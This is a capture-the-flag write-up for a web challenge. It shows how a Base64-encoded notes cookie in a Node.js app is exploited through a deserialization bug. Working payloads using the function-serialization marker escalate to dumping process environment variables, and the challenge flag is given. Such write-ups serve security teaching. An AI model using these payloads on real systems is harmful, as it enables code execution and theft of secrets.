Challenge Description
- Difficulty : Medium
- Points : 250
- Categoty : Web
Walkthrough
The black note application allows us to self register and save notes. After self registering and logging in, I noticed a cookie named notes. Inspecting it revealed that it is Base 64 encoded JSON data for the notes which are displayed in the page.
Since we know that the backend is Node.JS and the cookie is actaully getting deserialized, it obviously a JSON deserialisation vulnerability via the notes cookie.
The following articles are helpful in this regard.
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- https://www.netspi.com/blog/technical/web-application-penetration-testing/escape-nodejs-sandboxes/
I sent the Base 64 encoded version of the following payload in the notes cookie to see if my assumption is right.
{"notes":"_$$ND_FUNC$$_function (){ return 'hi'; }()"}
Indeed it was right. Next step was checking if we have access to the this object.
{"notes":"_$$ND_FUNC$$_function (){ return this; }()"}
Nice!. We have access to the this object and we can now use it to reveal information from the backend system or gain code execution. Since we know that the flag is stored in environment variables, we can extract it as follows.
{"notes":"_$$ND_FUNC$$_function (){ return this.process.env; }()"}
Base64 : eyJub3RlcyI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXsgcmV0dXJuIHRoaXMucHJvY2Vzcy5lbnY7IH0oKSJ9
Flag: BlackHatMEA{196:18:350d71cf705c5bbfb62e26ed84df5a0350142d71}